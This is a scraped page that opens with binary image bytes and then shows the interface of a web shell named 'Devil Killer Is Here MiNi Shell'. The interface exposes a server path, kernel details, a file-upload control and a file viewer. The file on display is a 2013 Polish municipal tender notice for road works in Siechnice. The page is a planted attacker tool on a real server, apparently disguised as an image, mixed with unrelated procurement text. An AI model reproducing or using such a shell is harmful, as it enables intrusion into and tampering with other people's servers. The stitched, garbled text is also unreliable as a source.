JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130807/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130807/318094-N-2013.html

<p class="kh_header"><b>Siechnice: Przebudowa i budowa ulicy Słonecznej w Świętej Katarzynie
- II etap</b><br>
<b>Numer ogłoszenia: 318094 - 2013; data zamieszczenia: 07.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Siechnic , ul. Jana Pawła II 12, 55-011 Siechnice, woj. dolnośląskie, tel. 71 391 91 01, faks 71 786 09 07.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.siechnice.gmina.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa i budowa ulicy Słonecznej w Świętej Katarzynie
- II etap.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest realizacja zadania pn.: Przebudowa i budowa ulicy Słonecznej w Świętej Katarzynie - II etap. 

Zakres zamówienia obejmuje przebudowę i budowę ulicy Słonecznej w Świętej Katarzynie - Etap II, od ul. Leszczynowej do ul. Strażackiej oraz przebudowę włączenia do ul. Zacharzyckiej wraz z remontem przepustu w celu podniesienia komfortu użytkowania i bezpieczeństwa ruchu drogowego oraz trwałości techniczno-eksploatacyjnej nawierzchni tej ulicy.

Gmina Siechnice na podstawie aktualnej decyzji wycięła wszystkie drzewa wymienione w decyzji. Wykonawca ma obowiązek wycenić wycinkę pozostałych drzew kolidujących z projektowanymi elementami drogi. Na wycinkę zostanie wydana wymagana przepisami decyzja bez obciążania opłatami Wykonawcy.

Wykonawca ma obowiązek zapoznać się dokumentacją projektową, wykonać wizje lokalną na terenie budowy  i zapoznać się z aktualnym stanem istniejącym u zarządców sieci. Wykonawca zobowiązany jest do usunięcia kolizji, które mogą się ujawnić w trakcie robót ziemnych, a wynikające z innego przebiegu uzbrojenia niż uwidocznione na wszystkich dostępnych mapach.

Kolidujące hydranty widoczne w dokumentacji projektowej należy uwzględnić do przeniesienia i ująć je w ofercie.

Do zadań Wykonawcy należy także  usunięcie lub przebudowanie istniejących słupów napowietrznych linii elektrycznej wraz z oświetleniem, które to kolidują z projektowanym chodnikiem. 

Przedmiot zamówienia obejmuje w szczególności zakres szczegółowo opisany w załączniku nr 2 do specyfikacji istotnych warunków zamówienia oraz w dokumentacji technicznej stanowiącej załączniki nr 15 do specyfikacji istotnych warunków zamówienia.

Dla prawidłowego oszacowania kosztów inwestycji przez Wykonawcę - jako dokument pomocniczy, Zamawiający załącza przedmiary robót, stanowiące załącznik nr 10 do specyfikacji istotnych warunków zamówienia. Przedmiar ten stanowi jedynie informację o charakterze pomocniczym, który wykonawca może wykorzystać wraz z informacjami zawartymi w dokumentacji technicznej do opracowania własnego przedmiaru. Przedmiar wykonawcy będzie podstawą do ustalania nakładów rzeczowych niezbędnych do wykonania robót stanowiących przedmiot zamówienia oraz oszacowania ceny oferty. 

Zamawiający zastrzega sobie prawo zmniejszenia lub zwiększenia zakresu zadania. Zmiany będą dotyczyły tylko zakresu, który wyniknie w trakcie realizacji zadania, a będzie niezbędny do właściwego zakończenia podstawowego zamówienia. 

Wykonawca będzie zobowiązany do naprawy uszkodzeń powstałych przy wykonywaniu zamówienia.

Tam, gdzie w SIWZ i dołączonych do niej załącznikach (np. rysunki, specyfikacje techniczne wykonania i odbioru robót budowlanych, projekty, przedmiary) zostało wskazane pochodzenie (marka, znak towarowy, producent, dostawca itp.) materiałów lub normy, aprobaty, specyfikacje i systemy, o których mowa w art. 30 ust. 1 - 3 ustawy Pzp, Zamawiający dopuszcza oferowanie materiałów lub rozwiązań równoważnych pod warunkiem, że zapewnią uzyskanie parametrów technicznych nie gorszych od założonych w wyżej wymienionych dokumentach.

Zamawiający nie dopuszcza składania ofert częściowych. Oferty nie zawierające pełnego zakresu przedmiotu zamówienia zostaną odrzucone.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamowien uzupełniających w zakresie analogicznym do przedmiotu
zamowienia</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.05.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawca przystępujący do przetargu jest obowiązany wnieść wadium
w wysokości 15.000,00 zł (słownie: piętnaście tysięcy złotych), najpóźniej do dnia składania ofert do godz.
11:30. Wadium powinno być wniesione w: 1)pieniądzu, 2)poręczeniach bankowych lub poręczeniach
spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem
pieniężnym; 3)gwarancji bankowej, 4)gwarancji ubezpieczeniowej lub 5)poręczeniach udzielanych przez
podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej
Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późniejszymi zmianami). Jeżeli wadium
składane będzie w pieniądzu należy je przelać na konto Zamawiającego: Bank Spółdzielczy w Oleśnicy
oddział Święta Katarzyna nr 78 9584 1092 2010 1000 0101 0008 z dopiskiem: Przebudowa i budowa ulicy
Słonecznej w Świętej Katarzynie - II etap, w terminie zapewniającym jego wpływ na ww konto do czasu
złożenia ofert. Dowód wpłaty wadium (potwierdzoną kserokopię) należy dołączyć do oferty. W przypadku
wnoszenia wadium w innych środkach (gwarancje bankowe lub ubezpieczeniowe), należy je złożyć do
depozytu znajdującego się w kasie Urzędu pok. nr 112, w godz. 800 - 1300 w terminie do dnia składania
ofert do godz. 1130. Oferty bez wniesionego wadium przetargowego będą traktowane jako nie spełniające
wymagań przetargu i na tej podstawie zostaną odrzucone, bez dalszego rozpatrywania. 2. Zwrot wadium
przetargowego wykonawcom nastąpi zgodnie z art. 46 ustawy Prawo zamówień publicznych (tj Dz. U. Nr
113 poz. 759 z 2010 r. z późniejszymi zmianami). 3. Sytuacje skutkujące zatrzymanie wadium: 1) w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Prawo zamówień publicznych,
wykonawca nie złożył dokumentów lub oświadczeń, chyba że udowodni, że wynika to z przyczyn nie
leżących po jego stronie; 2) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach
określonych w ofercie; 3) zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie wykonawcy.
4. Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej
lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako
najkorzystniejsza, z zastrzeżeniem pkt. 8.7. 5. Wykonawcy, którego oferta została wybrana jako
najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia
publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeśli jego wniesienia zażądano
w niniejszej SIWZ. 6. Zamawiający zwraca niezwłocznie wadium, na wniosek Wykonawcy, który wycofał
ofertę przed upływem terminu składania ofert. 7. Zamawiający żąda ponownego wniesienia wadium przez
Wykonawcę, któremu zwrócono wadium na podstawie pkt. 8.4 jeżeli w wyniku ostatecznego
rozstrzygnięcia protestu jego oferta została wybrana jako najkorzystniejsza.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli wykonawca wraz z ofertą złoży podpisane oświadczenia o
spełnieniu warunków w niniejszym postępowaniu zgodnie z wzorem zamieszczonym w
załączniku nr 3 do specyfikacji istotnych warunków zamówienia - Oświadczenie o spełnieniu
warunków udziału w postępowaniu. W przypadku składania oferty przez wykonawców
ubiegających się wspólnie o udzielenie zamówienia, wymagane oświadczenie musi być złożone
przez każdego wykonawcę</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli wykonawca wraz z ofertą złoży podpisany wykaz wykonanych
w okresie pięciu lat przed upływem terminu składania ofert - a jeżeli okres prowadzenia
działalności jest krótszy - w tym okresie, robót budowlanych. W wykazie wykonawca
zobowiązany jest do podania rodzaju, wartości, dat i miejsca wykonania wykazanych robót
budowlanych oraz załączy dowody dotyczące najważniejszych robót, określających, czy te
roboty zostały wykonane w sposób należyty, a także wskazujące, że zostały wykonane zgodnie z
zasadami sztuki budowlanej i prawidłowo ukończone. Wzór wykazu stanowi załącznik nr 7 do
specyfikacji istotnych warunków zamówienia (Wykaz wykonanych/wykonywanych w ciągu
ostatnich pięciu lat robót budowlanych). Dowodami, o których mowa powyżej są: 1) poświadczenie lub 2)jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie
jest w stanie uzyskać stosownego poświadczenia, oświadczenie wykonawcy. W przypadku, gdy
zamawiający jest podmiotem na rzecz którego roboty budowlane wskazane w wykazie, o którym
mowa w pkt. 2, zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania
dowodów, o których mowa niniejszym punkcie lub 3)dokumenty potwierdzające należyte
wykonanie robót budowlanych zgodnie z zasadami sztuki budowlanej i ich prawidłowe
ukończenie, określone w § 1 ust. 1 pkt 2 rozporządzenia Prezesa Rady Ministrów z dnia 30
grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od
wykonawców oraz form, w jakich te dokumenty mogą być składane (Dz.U. nr 226, poz 1817).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli wykonawca:
1)wykaże, że dysponuje lub będzie dysponować w okresie przewidzianym na realizację zamówienia sprzętem niezbędnym do realizacji zadania, tj.:
a)samochód samowyładowczy - 2 szt.
b)koparka kołowa samojezdna podsiębierna o poj. łyżki co najmniej 0,5m3 - 1 szt.,
c)koparko-ładowarka - 1 sztuka,
d)zagęszczarki płytowe wibracyjne o masie min. 300 kg - 2 szt.,
e)Rozkładarka do mas bitumicznych - 1 szt.,
f)walec drogowy (stalowy wibracją i ogumiony) - 1 szt.

2)wraz z ofertą złoży podpisany wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie dysponowania tymi zasobami, opracowany zgodnie z załączonym wzorem stanowiącym załącznik nr 9 do specyfikacji istotnych warunków zamówienia - Wykaz urządzeń technicznych dostępnych wykonawcy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli wykonawca: 1)wykaże, że dysponuje lub będzie dysponować
w okresie przewidzianym na realizację zamówienia osobami, które będą uczestniczyć w
wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych,
doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu
wykonywanych przez nie czynności, oraz informacją o podstawie dysponowania tymi osobami, w
szczególności osobami posiadającymi uprawnienia w rozumieniu ustawy Prawo budowlane z
dnia 7 lipca 1994 roku (tekst jednolity Dz. U. z 2006 r., Nr 156, poz. 1118 z późn. zm.) oraz
ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów
budownictwa oraz urbanistów (Dz. U. z 2001 r. Nr 5 poz. 42 z późn. zm.) lub odpowiadające im
ważne uprawnienia budowlane w zakresie pełnionej funkcji które zostały wydane na podstawie
wcześniej obowiązujących przepisów, tj. osobami: a)Kierownikiem budowy - osobą legitymującą się aktualnymi uprawnieniami do kierowania robotami budowlanymi w specjalności drogowej bez
ograniczeń i co najmniej 5 letnie doświadczenie zawodowe. Dodatkowo kierownik budowy
powinien się wykazać doświadczeniem w kierowaniu minimum 2. robotami budowlanymi
polegającymi na budowie lub przebudowie drogi o długości minimum 500 m z kanalizacją
deszczową b)Kierownikiem robót branżowych - osobą legitymującą się aktualnymi uprawnieniami
do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci i urządzeń
wodociągowych, kanalizacyjnych i gazowych bez ograniczeń. Warunek zostanie spełniony jeżeli
kierownik robót branżowych będzie posiadał co najmniej 5 letnie doświadczenie w wykonywaniu
robót budowlanych o charakterze i złożoności porównywalnej z przedmiotem zamówienia. Przez
lata doświadczenia Zamawiający rozumie się lata czynne zawodowo przed dniem wszczęcia
postępowania. 2)wraz z ofertą złoży podpisany wykaz osób, które będą uczestniczyć w realizacji
zamówienia, zawierający informację na temat ich kwalifikacji zawodowych, doświadczenia i
wykształcenia zgodnie z wymaganiami określonymi w pkt. 1, opracowany zgodnie z załączonym
wzorem stanowiącym załącznik nr 8 do specyfikacji istotnych warunków zamówienia - Wykaz
personelu odpowiedzialnego bezpośrednio za realizację zamówienia. 3)do oferty dołączy: a)
informację o podstawie do dysponowania osobą lub osobami, o których mowa w pkt. 1, b)
zobowiązanie osoby lub osób z uprawnieniami, że będą uczestniczyć w wykonywaniu
zamówienia, c)oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia
posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek ich posiadania.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Warunek zostanie spełniony, jeżeli wykonawca posiada ubezpieczenie prowadzonej działalności gospodarczej w zakresie będącym przedmiotem zamówienia.

W przypadku gdy ubezpieczenie nie obejmuje całego okresu realizacji zamówienia, Wykonawca zobowiązuję się do odnawiania aktualnie posiadanej polisy (innego dokumentu ubezpieczenia) na czas obejmujący wykonanie przedmiotu zamówienia. Wykonawca zobowiązany jest wraz z ofertą do złożenia oświadczenia w ww. zakresie zgodnie ze wzorem stanowiącym załącznik nr 16 do specyfikacji istotnych warunków zamówienia.

2.Zgodnie z art.26 ust.2b ustawy Pzp, jeżeli Wykonawca w celu spełnienia warunku, o którym mowa powyżej, polega na zasobach innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, zamawiający w celu oceny, czy wykonawca będzie dysponował wskazanymi zasobami w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, żąda przedstawienia dowodu posiadania aktualnej opłaconej polisy ubezpieczeniowej lub innego dokumentu potwierdzającego posiadanie aktualnego ubezpieczenia przez podmiot, z którego zasobów wykonawca korzysta.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>W celu zweryfikowania rzetelności, kwalifikacji, efektywności i doświadczenia Wykonawca zobowiązany jest w wykazie, o którym mowa powyżej, wskazać roboty budowlane, których zakres (charakter i złożoność) porównywalna jest z przedmiotem zamówienia, tj. powinien się wykazać wykonaniem minimum 2 zamówień polegających na budowie lub przebudowie drogi o długości minimum 500 m z kanalizacją deszczową. 

Wykonawca zobowiązany jest do wskazania w ww. wykazie robót budowlanych niewykonanych lub wykonanych nienależycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)podpisany druk oświadczenia o zaakceptowaniu warunków przetargu - druk w załączeniu (Załącznik nr 5 do specyfikacji istotnych warunków zamówienia - Oświadczenie o zaakceptowaniu warunków udziału w postępowaniu)

W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, wymagane oświadczenie musi  być złożone przez każdego wykonawcę w zakresie w jakim jego dotyczy.

2)Wykonawca, ubiegający się o niniejsze zamówienie, który polega na wiedzy i doświadczeniu, potencjale technicznym lub zdolności ekonomicznej i finansowej innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków, zgodnie z art. 26 ust. 2b PZP, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia oraz żąda złożenia dokumentów dotyczących:
a)zakresu dostępnych wykonawcy zasobów innego podmiotu,
b)sposobu wykorzystania zasobów innego podmiotu przez wykonawcę przy realizacji zamówienia,
c)charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem,
d)zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia.

3)jeżeli Wykonawca, wykazując spełnienie warunków, o których mowa w art. 22 ust.1 ustawy Pzp, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b Pzp, a podmioty te będą brały udział w realizacji zamówienia, Zamawiający żąda od Wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w pkt 6.2 - 6.4 specyfikacji istotnych warunków zamówienia

4)listę podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5, albo informację o tym, że Wykonawca nie należy do grupy kapitałowej, których wzór stanowią odpowiednio załączniki nr 12 i nr 13 do specyfikacji istotnych warunków zamówienia.

5)w przypadku oferty składanej przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia:

a)oświadczenia wymienione w pkt. 6.1 i 6.2 specyfikacji istotnych warunków zamówienia składane są przez wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia.  
b)dokumenty wymienione w pkt 6.3 specyfikacji istotnych warunków zamówienia składa każdy z Wykonawców. W przypadku prowadzenia działalności w formie spółki cywilnej i przedłożenia do oferty zaświadczenia o wpisie do ewidencji działalności gospodarczej należy do tego dokumentu dołączyć umowę spółki. Warunek nie ma zastosowania w przypadku załączenia do oferty aktualnego odpisu z właściwego rejestru, jeżeli ujawniono w nim wspólników spółki, jak i sposób reprezentowania spółki (składania oświadczeń woli).
